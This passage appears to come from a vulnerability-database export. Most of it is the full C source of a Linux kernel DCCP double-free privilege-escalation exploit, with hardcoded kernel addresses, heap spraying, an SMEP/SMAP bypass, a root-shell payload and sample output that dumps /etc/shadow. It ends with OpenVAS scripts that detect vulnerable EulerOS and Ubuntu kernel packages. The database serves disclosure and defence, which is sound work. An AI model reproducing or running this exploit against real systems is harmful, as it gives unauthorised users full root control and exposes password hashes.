checking if we got root \n// [+] got r00t ^_^ \n// [!] don't kill the exploit binary, the kernel will crash \n// # cat /etc/shadow \n// ... \n// daemon:*:17149:0:99999:7::: \n// bin:*:17149:0:99999:7::: \n// sys:*:17149:0:99999:7::: \n// sync:*:17149:0:99999:7::: \n// games:*:17149:0:99999:7::: \n// ... \n// \n// Andrey Konovalov <andreyknvl@gmail.com> \n \n#define _GNU_SOURCE \n \n#include <errno.h> \n#include <fcntl.h> \n#include <stdarg.h> \n#include <stdbool.h> \n#include <stddef.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n \n#include <sched.h> \n \n#include <sys/socket.h> \n#include <sys/syscall.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n \n#include <arpa/inet.h> \n#include <linux/if_packet.h> \n#include <netinet/if_ether.h> \n \n#define SMEP_SMAP_BYPASS 1 \n \n// Needed for local root. \n#define COMMIT_CREDS 0xffffffff810a2840L \n#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L \n#define SHINFO_OFFSET 1728 \n \n// Needed for SMEP_SMAP_BYPASS. \n#define NATIVE_WRITE_CR4 0xffffffff81064550ul \n#define CR4_DESIRED_VALUE 0x406e0ul \n#define TIMER_OFFSET (728 + 48 + 104) \n \n#define KMALLOC_PAD 128 \n#define KMALLOC_WARM 32 \n#define CATCH_FIRST 6 \n#define CATCH_AGAIN 16 \n#define CATCH_AGAIN_SMALL 64 \n \n// Port is incremented on each use. 
\nstatic int port = 11000; \n \nvoid debug(const char *msg) { \n/* \nchar buffer[32]; \nsnprintf(&buffer[0], sizeof(buffer), \"echo '%s' > /dev/kmsg\\n\", msg); \nsystem(buffer); \n*/ \n} \n \n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * \n \nstruct ubuf_info { \nuint64_t callback; // void (*callback)(struct ubuf_info *, bool) \nuint64_t ctx; // void * \nuint64_t desc; // unsigned long \n}; \n \nstruct skb_shared_info { \nuint8_t nr_frags; // unsigned char \nuint8_t tx_flags; // __u8 \nuint16_t gso_size; // unsigned short \nuint16_t gso_segs; // unsigned short \nuint16_t gso_type; // unsigned short \nuint64_t frag_list; // struct sk_buff * \nuint64_t hwtstamps; // struct skb_shared_hwtstamps \nuint32_t tskey; // u32 \nuint32_t ip6_frag_id; // __be32 \nuint32_t dataref; // atomic_t \nuint64_t destructor_arg; // void * \nuint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; \n}; \n \nstruct ubuf_info ui; \n \nvoid init_skb_buffer(char* buffer, void *func) { \nmemset(&buffer[0], 0, 2048); \n \nstruct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET]; \n \nssi->tx_flags = 0xff; \nssi->destructor_arg = (uint64_t)&ui; \nssi->nr_frags = 0; \nssi->frag_list = 0; \n \nui.callback = (unsigned long)func; \n} \n \nstruct timer_list { \nvoid *next; \nvoid *prev; \nunsigned long expires; \nvoid (*function)(unsigned long); \nunsigned long data; \nunsigned int flags; \nint slack; \n}; \n \nvoid init_timer_buffer(char* buffer, void *func, unsigned long arg) { \nmemset(&buffer[0], 0, 2048); \n \nstruct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET]; \n \ntimer->next = 0; \ntimer->prev = 0; \ntimer->expires = 4294943360; \ntimer->function = func; \ntimer->data = arg; \ntimer->flags = 1; \ntimer->slack = -1; \n} \n \n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * \n \nstruct dccp_handle { \nstruct sockaddr_in6 sa; \nint s1; \nint s2; \n}; \n \nvoid dccp_init(struct dccp_handle 
*handle, int port) { \nhandle->sa.sin6_family = AF_INET6; \nhandle->sa.sin6_port = htons(port); \ninet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr); \nhandle->sa.sin6_flowinfo = 0; \nhandle->sa.sin6_scope_id = 0; \n \nhandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"bind()\"); \nexit(EXIT_FAILURE); \n} \n \nrv = listen(handle->s1, 0x9); \nif (rv != 0) { \nperror(\"listen()\"); \nexit(EXIT_FAILURE); \n} \n \nint optval = 8; \nrv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, \n&optval, sizeof(optval)); \nif (rv != 0) { \nperror(\"setsockopt(IPV6_RECVPKTINFO)\"); \nexit(EXIT_FAILURE); \n} \n \nhandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kmalloc_kfree(struct dccp_handle *handle) { \nint rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"connect(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kfree_again(struct dccp_handle *handle) { \nint rv = shutdown(handle->s1, SHUT_RDWR); \nif (rv != 0) { \nperror(\"shutdown(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_destroy(struct dccp_handle *handle) { \nclose(handle->s1); \nclose(handle->s2); \n} \n \n// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * * \n \nstruct udp_fifo_handle { \nint fds[2]; \n}; \n \nvoid udp_fifo_init(struct udp_fifo_handle* handle) { \nint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds); \nif (rv != 0) { \nperror(\"socketpair()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_destroy(struct udp_fifo_handle* handle) { \nclose(handle->fds[0]); \nclose(handle->fds[1]); \n} \n \nvoid udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) { \nint rv = send(handle->fds[0], buffer, 1536, 0); \nif (rv 
!= 1536) { \nperror(\"send()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) { \nchar buffer[128]; \nint rv = send(handle->fds[0], &buffer[0], 128, 0); \nif (rv != 128) { \nperror(\"send()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid udp_fifo_kfree(struct udp_fifo_handle* handle) { \nchar buffer[2048]; \nint rv = recv(handle->fds[1], &buffer[0], 1536, 0); \nif (rv != 1536) { \nperror(\"recv()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nint timer_kmalloc() { \nint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); \nif (s == -1) { \nperror(\"socket(SOCK_DGRAM)\"); \nexit(EXIT_FAILURE); \n} \nreturn s; \n} \n \n#define CONF_RING_FRAMES 1 \nvoid timer_schedule(int handle, int timeout) { \nint optval = TPACKET_V3; \nint rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION, \n&optval, sizeof(optval)); \nif (rv != 0) { \nperror(\"setsockopt(PACKET_VERSION)\"); \nexit(EXIT_FAILURE); \n} \nstruct tpacket_req3 tp; \nmemset(&tp, 0, sizeof(tp)); \ntp.tp_block_size = CONF_RING_FRAMES * getpagesize(); \ntp.tp_block_nr = 1; \ntp.tp_frame_size = getpagesize(); \ntp.tp_frame_nr = CONF_RING_FRAMES; \ntp.tp_retire_blk_tov = timeout; \nrv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING, \n(void *)&tp, sizeof(tp)); \nif (rv != 0) { \nperror(\"setsockopt(PACKET_RX_RING)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid socket_sendmmsg(int sock, char *buffer) { \nstruct mmsghdr msg[1]; \n \nmsg[0].msg_hdr.msg_iovlen = 0; \n \n// Buffer to kmalloc. \nmsg[0].msg_hdr.msg_control = &buffer[0]; \nmsg[0].msg_hdr.msg_controllen = 2048; \n \n// Make sendmmsg exit easy with EINVAL. 
\nmsg[0].msg_hdr.msg_name = \"root\"; \nmsg[0].msg_hdr.msg_namelen = 1; \n \nint rv = syscall(__NR_sendmmsg, sock, msg, 1, 0); \nif (rv == -1 && errno != EINVAL) { \nperror(\"[-] sendmmsg()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid sendmmsg_kmalloc_kfree(int port, char *buffer) { \nint sock[2]; \n \nint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock); \nif (rv != 0) { \nperror(\"socketpair()\"); \nexit(EXIT_FAILURE); \n} \n \nsocket_sendmmsg(sock[0], buffer); \n \nclose(sock[0]); \n} \n \n// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * * \n \nvoid dccp_connect_pad(struct dccp_handle *handle, int port) { \nhandle->sa.sin6_family = AF_INET6; \nhandle->sa.sin6_port = htons(port); \ninet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr); \nhandle->sa.sin6_flowinfo = 0; \nhandle->sa.sin6_scope_id = 0; \n \nhandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"bind()\"); \nexit(EXIT_FAILURE); \n} \n \nrv = listen(handle->s1, 0x9); \nif (rv != 0) { \nperror(\"listen()\"); \nexit(EXIT_FAILURE); \n} \n \nhandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nrv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"connect(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kmalloc_pad() { \nint i; \nstruct dccp_handle handle; \nfor (i = 0; i < 4; i++) { \ndccp_connect_pad(&handle, port++); \n} \n} \n \nvoid timer_kmalloc_pad() { \nint i; \nfor (i = 0; i < 4; i++) { \nsocket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); \n} \n} \n \nvoid udp_kmalloc_pad() { \nint i, j; \nchar dummy[2048]; \nstruct udp_fifo_handle uh[16]; \nfor (i = 0; i < KMALLOC_PAD / 16; i++) { \nudp_fifo_init(&uh[i]); \nfor (j = 0; j < 16; j++) \nudp_fifo_kmalloc(&uh[i], &dummy[0]); 
\n} \n} \n \nvoid kmalloc_pad() { \ndebug(\"dccp kmalloc pad\"); \ndccp_kmalloc_pad(); \ndebug(\"timer kmalloc pad\"); \ntimer_kmalloc_pad(); \ndebug(\"udp kmalloc pad\"); \nudp_kmalloc_pad(); \n} \n \nvoid udp_kmalloc_warm() { \nint i, j; \nchar dummy[2048]; \nstruct udp_fifo_handle uh[16]; \nfor (i = 0; i < KMALLOC_WARM / 16; i++) { \nudp_fifo_init(&uh[i]); \nfor (j = 0; j < 16; j++) \nudp_fifo_kmalloc(&uh[i], &dummy[0]); \n} \nfor (i = 0; i < KMALLOC_WARM / 16; i++) { \nfor (j = 0; j < 16; j++) \nudp_fifo_kfree(&uh[i]); \n} \n} \n \nvoid kmalloc_warm() { \nudp_kmalloc_warm(); \n} \n \n// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * * \n \n// Executes func(arg) from interrupt context multiple times. \nvoid kernel_exec_irq(void *func, unsigned long arg) { \nint i; \nstruct dccp_handle dh; \nstruct udp_fifo_handle uh1, uh2, uh3, uh4; \nchar dummy[2048]; \nchar buffer[2048]; \n \nprintf(\"[.] scheduling %p(%p)\\n\", func, (void *)arg); \n \nmemset(&dummy[0], 0xc3, 2048); \ninit_timer_buffer(&buffer[0], func, arg); \n \nudp_fifo_init(&uh1); \nudp_fifo_init(&uh2); \nudp_fifo_init(&uh3); \nudp_fifo_init(&uh4); \n \ndebug(\"kmalloc pad\"); \nkmalloc_pad(); \n \ndebug(\"kmalloc warm\"); \nkmalloc_warm(); \n \ndebug(\"dccp init\"); \ndccp_init(&dh, port++); \n \ndebug(\"dccp kmalloc kfree\"); \ndccp_kmalloc_kfree(&dh); \n \ndebug(\"catch 1\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh1, &dummy[0]); \n \ndebug(\"dccp kfree again\"); \ndccp_kfree_again(&dh); \n \ndebug(\"catch 2\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh2, &dummy[0]); \n \nint timers[CATCH_FIRST]; \ndebug(\"catch 1 -> timer\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh1); \ntimers[i] = timer_kmalloc(); \n} \n \ndebug(\"catch 1 small\"); \nfor (i = 0; i < CATCH_AGAIN_SMALL; i++) \nudp_fifo_kmalloc_small(&uh4); \n \ndebug(\"schedule timers\"); \nfor (i = 0; i < CATCH_FIRST; i++) \ntimer_schedule(timers[i], 500); \n 
\ndebug(\"catch 2 -> overwrite timers\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh2); \nudp_fifo_kmalloc(&uh3, &buffer[0]); \n} \n \ndebug(\"catch 2 small\"); \nfor (i = 0; i < CATCH_AGAIN_SMALL; i++) \nudp_fifo_kmalloc_small(&uh4); \n \nprintf(\"[.] waiting for the timer to execute\\n\"); \n \ndebug(\"wait\"); \nsleep(1); \n \nprintf(\"[.] done\\n\"); \n} \n \nvoid disable_smep_smap() { \nprintf(\"[.] disabling SMEP & SMAP\\n\"); \nkernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE); \nprintf(\"[.] SMEP & SMAP should be off now\\n\"); \n} \n \n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * * \n \n// Executes func() from process context. \nvoid kernel_exec(void *func) { \nint i; \nstruct dccp_handle dh; \nstruct udp_fifo_handle uh1, uh2, uh3; \nchar dummy[2048]; \nchar buffer[2048]; \n \nprintf(\"[.] executing %p\\n\", func); \n \nmemset(&dummy[0], 0, 2048); \ninit_skb_buffer(&buffer[0], func); \n \nudp_fifo_init(&uh1); \nudp_fifo_init(&uh2); \nudp_fifo_init(&uh3); \n \ndebug(\"kmalloc pad\"); \nkmalloc_pad(); \n \ndebug(\"kmalloc warm\"); \nkmalloc_warm(); \n \ndebug(\"dccp init\"); \ndccp_init(&dh, port++); \n \ndebug(\"dccp kmalloc kfree\"); \ndccp_kmalloc_kfree(&dh); \n \ndebug(\"catch 1\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh1, &dummy[0]); \n \ndebug(\"dccp kfree again:\"); \ndccp_kfree_again(&dh); \n \ndebug(\"catch 2\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh2, &dummy[0]); \n \ndebug(\"catch 1 -> overwrite\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh1); \nsendmmsg_kmalloc_kfree(port++, &buffer[0]); \n} \ndebug(\"catch 2 -> free & trigger\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kfree(&uh2); \n \ndebug(\"catch 1 & 2\"); \nfor (i = 0; i < CATCH_AGAIN; i++) \nudp_fifo_kmalloc(&uh3, &dummy[0]); \n \nprintf(\"[.] 
done\\n\"); \n} \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); \n \n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; \n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; \n \nvoid get_root_payload(void) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nvoid get_root() { \nprintf(\"[.] getting root\\n\"); \nkernel_exec(&get_root_payload); \nprintf(\"[.] should be root now\\n\"); \n} \n \n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * \n \nvoid exec_shell() { \nchar *shell = \"/bin/bash\"; \nchar *args[] = {shell, \"-i\", NULL}; \nexecve(shell, args, NULL); \n} \n \nvoid fork_shell() { \npid_t rv; \n \nrv = fork(); \nif (rv == -1) { \nperror(\"fork()\"); \nexit(EXIT_FAILURE); \n} \n \nif (rv == 0) { \nexec_shell(); \n} \n} \n \nbool is_root() { \n// We can't simple check uid, since we're running inside a namespace \n// with uid set to 0. Try opening /etc/shadow instead. \nint fd = open(\"/etc/shadow\", O_RDONLY); \nif (fd == -1) \nreturn false; \nclose(fd); \nreturn true; \n} \n \nvoid check_root() { \nprintf(\"[.] checking if we got root\\n\"); \n \nif (!is_root()) { \nprintf(\"[-] something went wrong =(\\n\"); \nprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\"); \nreturn; \n} \n \nprintf(\"[+] got r00t ^_^\\n\"); \nprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\"); \n \n// Fork and exec instead of just doing the exec to avoid freeing \n// skbuffs and prevent crashes due to a allocator corruption. \nfork_shell(); \n} \n \nstatic bool write_file(const char* file, const char* what, ...) 
\n{ \nchar buf[1024]; \nva_list args; \nva_start(args, what); \nvsnprintf(buf, sizeof(buf), what, args); \nva_end(args); \nbuf[sizeof(buf) - 1] = 0; \nint len = strlen(buf); \n \nint fd = open(file, O_WRONLY | O_CLOEXEC); \nif (fd == -1) \nreturn false; \nif (write(fd, buf, len) != len) { \nclose(fd); \nreturn false; \n} \nclose(fd); \nreturn true; \n} \n \nvoid setup_sandbox() { \nint real_uid = getuid(); \nint real_gid = getgid(); \n \nif (unshare(CLONE_NEWUSER) != 0) { \nperror(\"unshare(CLONE_NEWUSER)\"); \nexit(EXIT_FAILURE); \n} \n \nif (unshare(CLONE_NEWNET) != 0) { \nperror(\"unshare(CLONE_NEWUSER)\"); \nexit(EXIT_FAILURE); \n} \n \nif (!write_file(\"/proc/self/setgroups\", \"deny\")) { \nperror(\"write_file(/proc/self/set_groups)\"); \nexit(EXIT_FAILURE); \n} \nif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){ \nperror(\"write_file(/proc/self/uid_map)\"); \nexit(EXIT_FAILURE); \n} \nif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) { \nperror(\"write_file(/proc/self/gid_map)\"); \nexit(EXIT_FAILURE); \n} \n \ncpu_set_t my_set; \nCPU_ZERO(&my_set); \nCPU_SET(0, &my_set); \nif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { \nperror(\"sched_setaffinity()\"); \nexit(EXIT_FAILURE); \n} \n \nif (system(\"/sbin/ifconfig lo up\") != 0) { \nperror(\"system(/sbin/ifconfig lo up)\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"[.] 
namespace sandbox setup successfully\\n\"); \n} \n \nint main() { \nsetup_sandbox(); \n \n#if SMEP_SMAP_BYPASS \ndisable_smep_smap(); \n#endif \n \nget_root(); \n \ncheck_root(); \n \nwhile (true) { \nsleep(100); \n} \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/141331/linux440dccp-escalate.txt"}], "openvas": [{"lastseen": "2020-01-27T18:33:38", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1369)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181369", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1369\");\n script_version(\"2020-01-23T11:23:38+0000\");\n script_cve_id(\"CVE-2017-18344\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:23:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:23:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1369)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1369\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1369\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1369 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent-sigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344)\");\n\n script_tag(name:\"affected\", value:\"'kernel' 
package(s) on Huawei EulerOS Virtualization 2.5.2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2872-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842609", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310842609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2872-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842609\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:46 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2872-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny 
Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic-lpae\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-lowlatency\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-e500mc\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-smp\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-emb\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-smp\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "description": "Mageia Linux Local Security Checks mgasa-2016-0033", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0033", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131197", "sourceData": "###############################################################################\n# OpenVAS 